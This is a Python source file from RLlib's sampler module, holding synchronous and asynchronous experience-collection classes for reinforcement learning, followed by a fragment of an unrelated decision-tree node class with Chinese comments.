get_data(self):\n raise NotImplementedError\n\n @abstractmethod\n @DeveloperAPI\n def get_metrics(self):\n raise NotImplementedError\n\n @abstractmethod\n @DeveloperAPI\n def get_extra_batches(self):\n raise NotImplementedError\n\n\n@DeveloperAPI\nclass SyncSampler(SamplerInput):\n \"\"\"Sync SamplerInput that collects experiences when `get_data()` is called.\n \"\"\"\n\n def __init__(self,\n *,\n worker,\n env,\n policies,\n policy_mapping_fn,\n preprocessors,\n obs_filters,\n clip_rewards,\n rollout_fragment_length,\n callbacks,\n horizon=None,\n pack_multiple_episodes_in_batch=False,\n tf_sess=None,\n clip_actions=True,\n soft_horizon=False,\n no_done_at_end=False,\n observation_fn=None):\n \"\"\"Initializes a SyncSampler object.\n\n Args:\n worker (RolloutWorker): The RolloutWorker that will use this\n Sampler for sampling.\n env (Env): Any Env object. Will be converted into an RLlib BaseEnv.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n policy_mapping_fn (callable): Callable that takes an agent ID and\n returns a Policy object.\n preprocessors (Dict[str,Preprocessor]): Mapping from policy ID to\n Preprocessor object for the observations prior to filtering.\n obs_filters (Dict[str,Filter]): Mapping from policy ID to\n env Filter object.\n clip_rewards (Union[bool,float]): True for +/-1.0 clipping, actual\n float value for +/- value clipping. False for no clipping.\n rollout_fragment_length (int): The length of a fragment to collect\n before building a SampleBatch from the data and resetting\n the SampleBatchBuilder object.\n callbacks (Callbacks): The Callbacks object to use when episode\n events happen during rollout.\n horizon (Optional[int]): Hard-reset the Env\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be\n exactly `rollout_fragment_length` in size.\n tf_sess (Optional[tf.Session]): A tf.Session object to use (only if\n framework=tf).\n clip_actions (bool): Whether to clip actions according to the\n given action_space's bounds.\n soft_horizon (bool): If True, calculate bootstrapped values as if\n episode had ended, but don't physically reset the environment\n when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the\n episode and instead record done=False.\n observation_fn (Optional[ObservationFunction]): Optional\n multi-agent observation func to use for preprocessing\n observations.\n \"\"\"\n\n self.base_env = BaseEnv.to_base_env(env)\n self.rollout_fragment_length = rollout_fragment_length\n self.horizon = horizon\n self.policies = policies\n self.policy_mapping_fn = policy_mapping_fn\n self.preprocessors = preprocessors\n self.obs_filters = obs_filters\n self.extra_batches = queue.Queue()\n self.perf_stats = PerfStats()\n # Create the rollout generator to use for calls to `get_data()`.\n self.rollout_provider = _env_runner(\n worker, self.base_env, self.extra_batches.put, self.policies,\n self.policy_mapping_fn, self.rollout_fragment_length, self.horizon,\n self.preprocessors, self.obs_filters, clip_rewards, clip_actions,\n pack_multiple_episodes_in_batch, callbacks, tf_sess,\n self.perf_stats, soft_horizon, no_done_at_end, observation_fn)\n self.metrics_queue = queue.Queue()\n\n @override(SamplerInput)\n def get_data(self):\n while True:\n item = next(self.rollout_provider)\n if isinstance(item, RolloutMetrics):\n self.metrics_queue.put(item)\n else:\n return item\n\n @override(SamplerInput)\n def get_metrics(self):\n completed = []\n while True:\n try:\n completed.append(self.metrics_queue.get_nowait()._replace(\n perf_stats=self.perf_stats.get()))\n except queue.Empty:\n break\n return completed\n\n @override(SamplerInput)\n def get_extra_batches(self):\n extra = []\n while True:\n try:\n extra.append(self.extra_batches.get_nowait())\n except queue.Empty:\n break\n return extra\n\n\n@DeveloperAPI\nclass AsyncSampler(threading.Thread, SamplerInput):\n \"\"\"Async SamplerInput that collects experiences in thread and queues them.\n\n Once started, experiences are continuously collected and put into a Queue,\n from where they can be unqueued by the caller of `get_data()`.\n \"\"\"\n\n def __init__(self,\n *,\n worker,\n env,\n policies,\n policy_mapping_fn,\n preprocessors,\n obs_filters,\n clip_rewards,\n rollout_fragment_length,\n callbacks,\n horizon=None,\n pack_multiple_episodes_in_batch=False,\n tf_sess=None,\n clip_actions=True,\n blackhole_outputs=False,\n soft_horizon=False,\n no_done_at_end=False,\n observation_fn=None):\n \"\"\"Initializes a AsyncSampler object.\n\n Args:\n worker (RolloutWorker): The RolloutWorker that will use this\n Sampler for sampling.\n env (Env): Any Env object. Will be converted into an RLlib BaseEnv.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n policy_mapping_fn (callable): Callable that takes an agent ID and\n returns a Policy object.\n preprocessors (Dict[str,Preprocessor]): Mapping from policy ID to\n Preprocessor object for the observations prior to filtering.\n obs_filters (Dict[str,Filter]): Mapping from policy ID to\n env Filter object.\n clip_rewards (Union[bool,float]): True for +/-1.0 clipping, actual\n float value for +/- value clipping. False for no clipping.\n rollout_fragment_length (int): The length of a fragment to collect\n before building a SampleBatch from the data and resetting\n the SampleBatchBuilder object.\n callbacks (Callbacks): The Callbacks object to use when episode\n events happen during rollout.\n horizon (Optional[int]): Hard-reset the Env\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be\n exactly `rollout_fragment_length` in size.\n tf_sess (Optional[tf.Session]): A tf.Session object to use (only if\n framework=tf).\n clip_actions (bool): Whether to clip actions according to the\n given action_space's bounds.\n blackhole_outputs (bool): Whether to collect samples, but then\n not further process or store them (throw away all samples).\n soft_horizon (bool): If True, calculate bootstrapped values as if\n episode had ended, but don't physically reset the environment\n when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the\n episode and instead record done=False.\n observation_fn (Optional[ObservationFunction]): Optional\n multi-agent observation func to use for preprocessing\n observations.\n \"\"\"\n for _, f in obs_filters.items():\n assert getattr(f, \"is_concurrent\", False), \\\n \"Observation Filter must support concurrent updates.\"\n self.worker = worker\n self.base_env = BaseEnv.to_base_env(env)\n threading.Thread.__init__(self)\n self.queue = queue.Queue(5)\n self.extra_batches = queue.Queue()\n self.metrics_queue = queue.Queue()\n self.rollout_fragment_length = rollout_fragment_length\n self.horizon = horizon\n self.policies = policies\n self.policy_mapping_fn = policy_mapping_fn\n self.preprocessors = preprocessors\n self.obs_filters = obs_filters\n self.clip_rewards = clip_rewards\n self.daemon = True\n self.pack_multiple_episodes_in_batch = pack_multiple_episodes_in_batch\n self.tf_sess = tf_sess\n self.callbacks = callbacks\n self.clip_actions = clip_actions\n self.blackhole_outputs = blackhole_outputs\n self.soft_horizon = soft_horizon\n self.no_done_at_end = no_done_at_end\n self.perf_stats = PerfStats()\n self.shutdown = False\n self.observation_fn = observation_fn\n\n @override(threading.Thread)\n def run(self):\n try:\n self._run()\n except BaseException as e:\n self.queue.put(e)\n raise e\n\n def _run(self):\n if self.blackhole_outputs:\n queue_putter = (lambda x: None)\n extra_batches_putter = (lambda x: None)\n else:\n queue_putter = self.queue.put\n extra_batches_putter = (\n lambda x: self.extra_batches.put(x, timeout=600.0))\n rollout_provider = _env_runner(\n self.worker, self.base_env, extra_batches_putter, self.policies,\n self.policy_mapping_fn, self.rollout_fragment_length, self.horizon,\n self.preprocessors, self.obs_filters, self.clip_rewards,\n self.clip_actions, self.pack_multiple_episodes_in_batch,\n self.callbacks, self.tf_sess, self.perf_stats, self.soft_horizon,\n self.no_done_at_end, self.observation_fn)\n while not self.shutdown:\n # The timeout variable exists because apparently, if one worker\n # dies, the other workers won't die with it, unless the timeout is\n # set to some large number. This is an empirical observation.\n item = next(rollout_provider)\n if isinstance(item, RolloutMetrics):\n self.metrics_queue.put(item)\n else:\n queue_putter(item)\n\n @override(SamplerInput)\n def get_data(self):\n if not self.is_alive():\n raise RuntimeError(\"Sampling thread has died\")\n rollout = self.queue.get(timeout=600.0)\n\n # Propagate errors\n if isinstance(rollout, BaseException):\n raise rollout\n\n return rollout\n\n @override(SamplerInput)\n def get_metrics(self):\n completed = []\n while True:\n try:\n completed.append(self.metrics_queue.get_nowait()._replace(\n perf_stats=self.perf_stats.get()))\n except queue.Empty:\n break\n return completed\n\n @override(SamplerInput)\n def get_extra_batches(self):\n extra = []\n while True:\n try:\n extra.append(self.extra_batches.get_nowait())\n except queue.Empty:\n break\n return extra\n\n\ndef _env_runner(worker, base_env, extra_batch_callback, policies,\n policy_mapping_fn, rollout_fragment_length, horizon,\n preprocessors, obs_filters, clip_rewards, clip_actions,\n pack_multiple_episodes_in_batch, callbacks, tf_sess,\n perf_stats, soft_horizon, no_done_at_end, observation_fn):\n \"\"\"This implements the common experience collection logic.\n\n Args:\n worker (RolloutWorker): Reference to the current rollout worker.\n base_env (BaseEnv): Env implementing BaseEnv.\n extra_batch_callback (fn): function to send extra batch data to.\n policies (dict): Map of policy ids to Policy instances.\n policy_mapping_fn (func): Function that maps agent ids to policy ids.\n This is called when an agent first enters the environment. The\n agent is then \"bound\" to the returned policy for the episode.\n rollout_fragment_length (int): Number of episode steps before\n `SampleBatch` is yielded. Set to infinity to yield complete\n episodes.\n horizon (int): Horizon of the episode.\n preprocessors (dict): Map of policy id to preprocessor for the\n observations prior to filtering.\n obs_filters (dict): Map of policy id to filter used to process\n observations for the policy.\n clip_rewards (bool): Whether to clip rewards before postprocessing.\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be exactly\n `rollout_fragment_length` in size.\n clip_actions (bool): Whether to clip actions to the space range.\n callbacks (DefaultCallbacks): User callbacks to run on episode events.\n tf_sess (Session|None): Optional tensorflow session to use for batching\n TF policy evaluations.\n perf_stats (PerfStats): Record perf stats into this object.\n soft_horizon (bool): Calculate rewards but don't reset the\n environment when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the episode\n and instead record done=False.\n observation_fn (ObservationFunction): Optional multi-agent\n observation func to use for preprocessing observations.\n\n Yields:\n rollout (SampleBatch): Object containing state, action, reward,\n terminal condition, and other fields as dictated by `policy`.\n \"\"\"\n\n # Try to get Env's max_episode_steps prop. If it doesn't exist, catch\n # error and continue.\n max_episode_steps = None\n try:\n max_episode_steps = base_env.get_unwrapped()[0].spec.max_episode_steps\n except Exception:\n pass\n\n # Trainer has a given `horizon` setting.\n if horizon:\n # `horizon` is larger than env's limit -> Error and explain how\n # to increase Env's own episode limit.\n if max_episode_steps and horizon > max_episode_steps:\n raise ValueError(\n \"Your `horizon` setting ({}) is larger than the Env's own \"\n \"timestep limit ({})! Try to increase the Env's limit via \"\n \"setting its `spec.max_episode_steps` property.\".format(\n horizon, max_episode_steps))\n # Otherwise, set Trainer's horizon to env's max-steps.\n elif max_episode_steps:\n horizon = max_episode_steps\n logger.debug(\n \"No episode horizon specified, setting it to Env's limit ({}).\".\n format(max_episode_steps))\n else:\n horizon = float(\"inf\")\n logger.debug(\"No episode horizon specified, assuming inf.\")\n\n # Pool of batch builders, which can be shared across episodes to pack\n # trajectory data.\n batch_builder_pool = []\n\n def get_batch_builder():\n if batch_builder_pool:\n return batch_builder_pool.pop()\n else:\n return MultiAgentSampleBatchBuilder(policies, clip_rewards,\n callbacks)\n\n def new_episode():\n episode = MultiAgentEpisode(policies, policy_mapping_fn,\n get_batch_builder, extra_batch_callback)\n # Call each policy's Exploration.on_episode_start method.\n for p in policies.values():\n if getattr(p, \"exploration\", None) is not None:\n p.exploration.on_episode_start(\n policy=p,\n environment=base_env,\n episode=episode,\n tf_sess=getattr(p, \"_sess\", None))\n callbacks.on_episode_start(\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n return episode\n\n active_episodes = defaultdict(new_episode)\n\n while True:\n perf_stats.iters += 1\n t0 = time.time()\n # Get observations from all ready agents.\n unfiltered_obs, rewards, dones, infos, off_policy_actions = \\\n base_env.poll()\n perf_stats.env_wait_time += time.time() - t0\n\n if log_once(\"env_returns\"):\n logger.info(\"Raw obs from env: {}\".format(\n summarize(unfiltered_obs)))\n logger.info(\"Info return from env: {}\".format(summarize(infos)))\n\n # Process observations and prepare for policy evaluation.\n t1 = time.time()\n active_envs, to_eval, outputs = _process_observations(\n worker=worker,\n base_env=base_env,\n policies=policies,\n batch_builder_pool=batch_builder_pool,\n active_episodes=active_episodes,\n unfiltered_obs=unfiltered_obs,\n rewards=rewards,\n dones=dones,\n infos=infos,\n horizon=horizon,\n preprocessors=preprocessors,\n obs_filters=obs_filters,\n rollout_fragment_length=rollout_fragment_length,\n pack_multiple_episodes_in_batch=pack_multiple_episodes_in_batch,\n callbacks=callbacks,\n soft_horizon=soft_horizon,\n no_done_at_end=no_done_at_end,\n observation_fn=observation_fn)\n perf_stats.processing_time += time.time() - t1\n for o in outputs:\n yield o\n\n # Do batched policy eval (accross vectorized envs).\n t2 = time.time()\n eval_results = _do_policy_eval(\n to_eval=to_eval,\n policies=policies,\n active_episodes=active_episodes,\n tf_sess=tf_sess)\n perf_stats.inference_time += time.time() - t2\n\n # Process results and update episode state.\n t3 = time.time()\n actions_to_send = _process_policy_eval_results(\n to_eval=to_eval,\n eval_results=eval_results,\n active_episodes=active_episodes,\n active_envs=active_envs,\n off_policy_actions=off_policy_actions,\n policies=policies,\n clip_actions=clip_actions)\n perf_stats.processing_time += time.time() - t3\n\n # Return computed actions to ready envs. We also send to envs that have\n # taken off-policy actions; those envs are free to ignore the action.\n t4 = time.time()\n base_env.send_actions(actions_to_send)\n perf_stats.env_wait_time += time.time() - t4\n\n\ndef _process_observations(\n worker, base_env, policies, batch_builder_pool, active_episodes,\n unfiltered_obs, rewards, dones, infos, horizon, preprocessors,\n obs_filters, rollout_fragment_length, pack_multiple_episodes_in_batch,\n callbacks, soft_horizon, no_done_at_end, observation_fn):\n \"\"\"Record new data from the environment and prepare for policy evaluation.\n\n Args:\n worker (RolloutWorker): Reference to the current rollout worker.\n base_env (BaseEnv): Env implementing BaseEnv.\n policies (dict): Map of policy ids to Policy instances.\n batch_builder_pool (List[SampleBatchBuilder]): List of pooled\n SampleBatchBuilder object for recycling.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n unfiltered_obs (dict): Doubly keyed dict of env-ids -> agent ids ->\n unfiltered observation tensor, returned by a `BaseEnv.poll()` call.\n rewards (dict): Doubly keyed dict of env-ids -> agent ids ->\n rewards tensor, returned by a `BaseEnv.poll()` call.\n dones (dict): Doubly keyed dict of env-ids -> agent ids ->\n boolean done flags, returned by a `BaseEnv.poll()` call.\n infos (dict): Doubly keyed dict of env-ids -> agent ids ->\n info dicts, returned by a `BaseEnv.poll()` call.\n horizon (int): Horizon of the episode.\n preprocessors (dict): Map of policy id to preprocessor for the\n observations prior to filtering.\n obs_filters (dict): Map of policy id to filter used to process\n observations for the policy.\n rollout_fragment_length (int): Number of episode steps before\n `SampleBatch` is yielded. Set to infinity to yield complete\n episodes.\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be exactly\n `rollout_fragment_length` in size.\n callbacks (DefaultCallbacks): User callbacks to run on episode events.\n soft_horizon (bool): Calculate rewards but don't reset the\n environment when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the episode\n and instead record done=False.\n observation_fn (ObservationFunction): Optional multi-agent\n observation func to use for preprocessing observations.\n\n Returns:\n Tuple:\n - active_envs: Set of non-terminated env ids.\n - to_eval: Map of policy_id to list of agent PolicyEvalData.\n - outputs: List of metrics and samples to return from the sampler.\n \"\"\"\n\n active_envs = set()\n to_eval = defaultdict(list)\n outputs = []\n large_batch_threshold = max(1000, rollout_fragment_length * 10) if \\\n rollout_fragment_length != float(\"inf\") else 5000\n\n # For each environment.\n for env_id, agent_obs in unfiltered_obs.items():\n is_new_episode = env_id not in active_episodes\n episode = active_episodes[env_id]\n if not is_new_episode:\n episode.length += 1\n episode.batch_builder.count += 1\n episode._add_agent_rewards(rewards[env_id])\n\n if (episode.batch_builder.total() > large_batch_threshold\n and log_once(\"large_batch_warning\")):\n logger.warning(\n \"More than {} observations for {} env steps \".format(\n episode.batch_builder.total(),\n episode.batch_builder.count) + \"are buffered in \"\n \"the sampler. If this is more than you expected, check that \"\n \"that you set a horizon on your environment correctly and that\"\n \" it terminates at some point. \"\n \"Note: In multi-agent environments, `rollout_fragment_length` \"\n \"sets the batch size based on environment steps, not the \"\n \"steps of \"\n \"individual agents, which can result in unexpectedly large \"\n \"batches. Also, you may be in evaluation waiting for your Env \"\n \"to terminate (batch_mode=`complete_episodes`). Make sure it \"\n \"does at some point.\")\n\n # Check episode termination conditions.\n if dones[env_id][\"__all__\"] or episode.length >= horizon:\n hit_horizon = (episode.length >= horizon\n and not dones[env_id][\"__all__\"])\n all_agents_done = True\n atari_metrics = _fetch_atari_metrics(base_env)\n if atari_metrics is not None:\n for m in atari_metrics:\n outputs.append(\n m._replace(custom_metrics=episode.custom_metrics))\n else:\n outputs.append(\n RolloutMetrics(episode.length, episode.total_reward,\n dict(episode.agent_rewards),\n episode.custom_metrics, {},\n episode.hist_data))\n else:\n hit_horizon = False\n all_agents_done = False\n active_envs.add(env_id)\n\n # Custom observation function is applied before preprocessing.\n if observation_fn:\n agent_obs = observation_fn(\n agent_obs=agent_obs,\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n if not isinstance(agent_obs, dict):\n raise ValueError(\n \"observe() must return a dict of agent observations\")\n\n # For each agent in the environment.\n for agent_id, raw_obs in agent_obs.items():\n assert agent_id != \"__all__\"\n policy_id = episode.policy_for(agent_id)\n prep_obs = _get_or_raise(preprocessors,\n policy_id).transform(raw_obs)\n if log_once(\"prep_obs\"):\n logger.info(\"Preprocessed obs: {}\".format(summarize(prep_obs)))\n\n filtered_obs = _get_or_raise(obs_filters, policy_id)(prep_obs)\n if log_once(\"filtered_obs\"):\n logger.info(\"Filtered obs: {}\".format(summarize(filtered_obs)))\n\n agent_done = bool(all_agents_done or dones[env_id].get(agent_id))\n if not agent_done:\n to_eval[policy_id].append(\n PolicyEvalData(env_id, agent_id, filtered_obs,\n infos[env_id].get(agent_id, {}),\n episode.rnn_state_for(agent_id),\n episode.last_action_for(agent_id),\n rewards[env_id][agent_id] or 0.0))\n\n last_observation = episode.last_observation_for(agent_id)\n episode._set_last_observation(agent_id, filtered_obs)\n episode._set_last_raw_obs(agent_id, raw_obs)\n episode._set_last_info(agent_id, infos[env_id].get(agent_id, {}))\n\n # Record transition info if applicable.\n if (last_observation is not None and infos[env_id].get(\n agent_id, {}).get(\"training_enabled\", True)):\n episode.batch_builder.add_values(\n agent_id,\n policy_id,\n t=episode.length - 1,\n eps_id=episode.episode_id,\n agent_index=episode._agent_index(agent_id),\n obs=last_observation,\n actions=episode.last_action_for(agent_id),\n rewards=rewards[env_id][agent_id],\n prev_actions=episode.prev_action_for(agent_id),\n prev_rewards=episode.prev_reward_for(agent_id),\n dones=(False if (no_done_at_end\n or (hit_horizon and soft_horizon)) else\n agent_done),\n infos=infos[env_id].get(agent_id, {}),\n new_obs=filtered_obs,\n **episode.last_pi_info_for(agent_id))\n\n # Invoke the step callback after the step is logged to the episode\n callbacks.on_episode_step(\n worker=worker, base_env=base_env, episode=episode)\n\n # Cut the batch if we're not packing multiple episodes into one,\n # or if we've exceeded the requested batch size.\n if episode.batch_builder.has_pending_agent_data():\n # Sanity check, whether all agents have done=True, if done[__all__]\n # is True.\n if dones[env_id][\"__all__\"] and not no_done_at_end:\n episode.batch_builder.check_missing_dones()\n\n # Reached end of episode and we are not allowed to pack the\n # next episode into the same SampleBatch -> Build the SampleBatch\n # and add it to \"outputs\".\n if (all_agents_done and not pack_multiple_episodes_in_batch) or \\\n episode.batch_builder.count >= rollout_fragment_length:\n outputs.append(episode.batch_builder.build_and_reset(episode))\n # Make sure postprocessor stays within one episode.\n elif all_agents_done:\n episode.batch_builder.postprocess_batch_so_far(episode)\n\n if all_agents_done:\n # Handle episode termination.\n batch_builder_pool.append(episode.batch_builder)\n # Call each policy's Exploration.on_episode_end method.\n for p in policies.values():\n if getattr(p, \"exploration\", None) is not None:\n p.exploration.on_episode_end(\n policy=p,\n environment=base_env,\n episode=episode,\n tf_sess=getattr(p, \"_sess\", None))\n # Call custom on_episode_end callback.\n callbacks.on_episode_end(\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n if hit_horizon and soft_horizon:\n episode.soft_reset()\n resetted_obs = agent_obs\n else:\n del active_episodes[env_id]\n resetted_obs = base_env.try_reset(env_id)\n if resetted_obs is None:\n # Reset not supported, drop this env from the ready list.\n if horizon != float(\"inf\"):\n raise ValueError(\n \"Setting episode horizon requires reset() support \"\n \"from the environment.\")\n elif resetted_obs != ASYNC_RESET_RETURN:\n # Creates a new episode if this is not async return.\n # If reset is async, we will get its result in some future poll\n episode = active_episodes[env_id]\n if observation_fn:\n resetted_obs = observation_fn(\n agent_obs=resetted_obs,\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n for agent_id, raw_obs in resetted_obs.items():\n policy_id = episode.policy_for(agent_id)\n policy = _get_or_raise(policies, policy_id)\n prep_obs = _get_or_raise(preprocessors,\n policy_id).transform(raw_obs)\n filtered_obs = _get_or_raise(obs_filters,\n policy_id)(prep_obs)\n episode._set_last_observation(agent_id, filtered_obs)\n to_eval[policy_id].append(\n PolicyEvalData(\n env_id, agent_id, filtered_obs,\n episode.last_info_for(agent_id) or {},\n episode.rnn_state_for(agent_id),\n np.zeros_like(\n flatten_to_single_ndarray(\n policy.action_space.sample())), 0.0))\n\n return active_envs, to_eval, outputs\n\n\ndef _do_policy_eval(*, to_eval, policies, active_episodes, tf_sess=None):\n \"\"\"Call compute_actions on collected episode/model data to get next action.\n\n Args:\n tf_sess (Optional[tf.Session]): Optional tensorflow session to use for\n batching TF policy evaluations.\n to_eval (Dict[str,List[PolicyEvalData]]): Mapping of policy IDs to\n lists of PolicyEvalData objects.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n\n Returns:\n eval_results: dict of policy to compute_action() outputs.\n \"\"\"\n\n eval_results = {}\n\n if tf_sess:\n builder = TFRunBuilder(tf_sess, \"policy_eval\")\n pending_fetches = {}\n else:\n builder = None\n\n if log_once(\"compute_actions_input\"):\n logger.info(\"Inputs to compute_actions():\\n\\n{}\\n\".format(\n summarize(to_eval)))\n\n for policy_id, eval_data in to_eval.items():\n rnn_in = [t.rnn_state for t in eval_data]\n policy = _get_or_raise(policies, policy_id)\n # If tf (non eager) AND TFPolicy's compute_action method has not been\n # overridden -> Use `policy._build_compute_actions()`.\n if builder and (policy.compute_actions.__code__ is\n TFPolicy.compute_actions.__code__):\n\n obs_batch = [t.obs for t in eval_data]\n state_batches = _to_column_format(rnn_in)\n # TODO(ekl): how can we make info batch available to TF code?\n prev_action_batch = [t.prev_action for t in eval_data]\n prev_reward_batch = [t.prev_reward for t in eval_data]\n\n pending_fetches[policy_id] = policy._build_compute_actions(\n builder,\n obs_batch=obs_batch,\n state_batches=state_batches,\n prev_action_batch=prev_action_batch,\n prev_reward_batch=prev_reward_batch,\n timestep=policy.global_timestep)\n else:\n rnn_in_cols = [\n np.stack([row[i] for row in rnn_in])\n for i in range(len(rnn_in[0]))\n ]\n eval_results[policy_id] = policy.compute_actions(\n [t.obs for t in eval_data],\n state_batches=rnn_in_cols,\n prev_action_batch=[t.prev_action for t in eval_data],\n prev_reward_batch=[t.prev_reward for t in eval_data],\n info_batch=[t.info for t in eval_data],\n episodes=[active_episodes[t.env_id] for t in eval_data],\n timestep=policy.global_timestep)\n if builder:\n for pid, v in pending_fetches.items():\n eval_results[pid] = builder.get(v)\n\n if log_once(\"compute_actions_result\"):\n logger.info(\"Outputs of compute_actions():\\n\\n{}\\n\".format(\n summarize(eval_results)))\n\n return eval_results\n\n\ndef _process_policy_eval_results(*, to_eval, eval_results, active_episodes,\n active_envs, off_policy_actions, policies,\n clip_actions):\n \"\"\"Process the output of policy neural network evaluation.\n\n Records policy evaluation results into the given episode objects and\n returns replies to send back to agents in the env.\n\n Args:\n to_eval (Dict[str,List[PolicyEvalData]]): Mapping of policy IDs to\n lists of PolicyEvalData objects.\n eval_results (Dict[str,List]): Mapping of policy IDs to list of\n actions, rnn-out states, extra-action-fetches dicts.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n active_envs (Set[int]): Set of non-terminated env ids.\n off_policy_actions (dict): Doubly keyed dict of env-ids -> agent ids ->\n off-policy-action, returned by a `BaseEnv.poll()` call.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n clip_actions (bool): Whether to clip actions to the action space's\n bounds.\n\n Returns:\n actions_to_send: Nested dict of env id -> agent id -> agent replies.\n \"\"\"\n\n actions_to_send = defaultdict(dict)\n for env_id in active_envs:\n actions_to_send[env_id] = {} # at minimum send empty dict\n\n for policy_id, eval_data in to_eval.items():\n rnn_in_cols = _to_column_format([t.rnn_state for t in eval_data])\n\n actions = eval_results[policy_id][0]\n rnn_out_cols = eval_results[policy_id][1]\n pi_info_cols = eval_results[policy_id][2]\n\n # In case actions is a list (representing the 0th dim of a batch of\n # primitive actions), try to convert it first.\n if isinstance(actions, list):\n actions = np.array(actions)\n\n if len(rnn_in_cols) != len(rnn_out_cols):\n raise ValueError(\"Length of RNN in did not match RNN out, got: \"\n \"{} vs {}\".format(rnn_in_cols, rnn_out_cols))\n # Add RNN state info\n for f_i, column in enumerate(rnn_in_cols):\n pi_info_cols[\"state_in_{}\".format(f_i)] = column\n for f_i, column in enumerate(rnn_out_cols):\n pi_info_cols[\"state_out_{}\".format(f_i)] = column\n\n policy = _get_or_raise(policies, policy_id)\n # Split action-component batches into single action rows.\n actions = unbatch(actions)\n for i, action in enumerate(actions):\n env_id = eval_data[i].env_id\n agent_id = eval_data[i].agent_id\n # Clip if necessary.\n if clip_actions:\n clipped_action = clip_action(action,\n policy.action_space_struct)\n else:\n clipped_action = action\n actions_to_send[env_id][agent_id] = clipped_action\n episode = active_episodes[env_id]\n episode._set_rnn_state(agent_id, [c[i] for c in rnn_out_cols])\n episode._set_last_pi_info(\n agent_id, {k: v[i]\n for k, v in pi_info_cols.items()})\n if env_id in off_policy_actions and \\\n agent_id in off_policy_actions[env_id]:\n episode._set_last_action(agent_id,\n off_policy_actions[env_id][agent_id])\n else:\n episode._set_last_action(agent_id, action)\n\n return actions_to_send\n\n\ndef _fetch_atari_metrics(base_env):\n \"\"\"Atari games have multiple logical episodes, one per life.\n\n However, for metrics reporting we count full episodes, all lives included.\n \"\"\"\n unwrapped = base_env.get_unwrapped()\n if not unwrapped:\n return None\n atari_out = []\n for u in unwrapped:\n monitor = get_wrapper_by_cls(u, MonitorEnv)\n if not monitor:\n return None\n for eps_rew, eps_len in monitor.next_episode_results():\n atari_out.append(RolloutMetrics(eps_len, eps_rew))\n return atari_out\n\n\ndef _to_column_format(rnn_state_rows):\n num_cols = len(rnn_state_rows[0])\n return [[row[i] for row in rnn_state_rows] for i in range(num_cols)]\n\n\ndef _get_or_raise(mapping, policy_id):\n \"\"\"Returns a Policy object under key `policy_id` in `mapping`.\n\n Args:\n mapping (dict): The mapping dict from policy id (str) to\n actual Policy object.\n policy_id (str): The policy ID to lookup.\n\n Returns:\n Policy: The found Policy object.\n\n Throws:\n ValueError: If `policy_id` cannot be found.\n \"\"\"\n if policy_id not in mapping:\n raise ValueError(\n \"Could not find policy for agent: agent policy id `{}` not \"\n \"in policy map keys {}.\".format(policy_id, mapping.keys()))\n return mapping[policy_id]\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/rllib/evaluation/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":41280,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"9448989126","text":"# In[125]:\nimport numpy as np\nfrom FeatureImportance import *\n\nimport operator\nclass DTNode:\n '''\n 决策树节点\n '''\n def __init__(self, x, y, default_label, split_val = None, cart_cols = []):\n self.children = []\n if(len(y) != 0):\n self.label = Counter(y.reshape(1, -1).tolist()[0]).most_common(1)[0][0]\n else:\n self.label = default_label\n self.next_split_index = None\n self.split_val = split_val\n self.x = x.copy()\n self.y = y.copy()\n self.xy = np.hstack([x, y])\n self.default_label = default_label\n self.cart_cols = cart_cols\n def get_x(self):\n return self.x\n def get_y(self):\n return self.y\n def get_xy(self):\n return self.xy\n def get_children(self):\n return self.children\n def get_label(self):\n return self.label\n def get_next_split_index(self):\n return self.next_split_index\n def get_split_val(self):\n return self.split_val\n def _get_real_cols_num(self, arr):\n if(arr.shape[0] == 0):\n return 0\n else:\n return arr.shape[1]\n def _get_x_and_xval(self, calculate_method, threshold):\n '''\n 根据所选方法及阈值,计算信息增益(比),选择目标特征, 并计算目标特征取值种类\n '''\n res = {}\n for col_index in range(self._get_real_cols_num(self.x)):\n res[col_index] = calculate_method(self.x[:, col_index].reshape(-1, 1), self.y.reshape(-1, 1))\n if(operator.eq(res, {})):\n return None, None\n else:\n target = sorted(res, key=res.__getitem__, reverse=True)[0]\n if(res[target] < threshold):\n return None, None\n else:\n return target, np.unique(self.x[:, target])\n def _cart_get_x_and_feature(self, calculate_method, threshold, cols):\n '''\n 根据所选方法及阈值,计算基尼指数以及均方差,返回最佳划分特征,以及最佳划分特征值\n '''\n res = {}\n for col_index in cols:\n res[col_index] = calculate_method(self.x[:, col_index].reshape(-1, 1), self.y.reshape(-1, 1))\n target = sorted(res[col_index], key=res[col_index].__getitem__)[0]\n res[col_index] = (target, res[col_index][target])\n if(operator.eq(res, {})):\n return None, None\n else:\n target = sorted(res, key = lambda k: res[k][1])[0]\n if(res[target][1] < threshold):\n return None, None\n else:\n return target, res[target][0]\n \n def _build_exit(self):\n if(len(np.unique(self.y)) == 1):\n self.label = np.unique(self.y)[0]\n return True\n elif(operator.eq(self.x.tolist(), [])):\n self.label = self.default_label\n return True\n else:\n return False\n \n def _cart_build_exit(self):\n if(operator.eq(self.x.tolist(), [])):\n self.label = self.default_label\n return 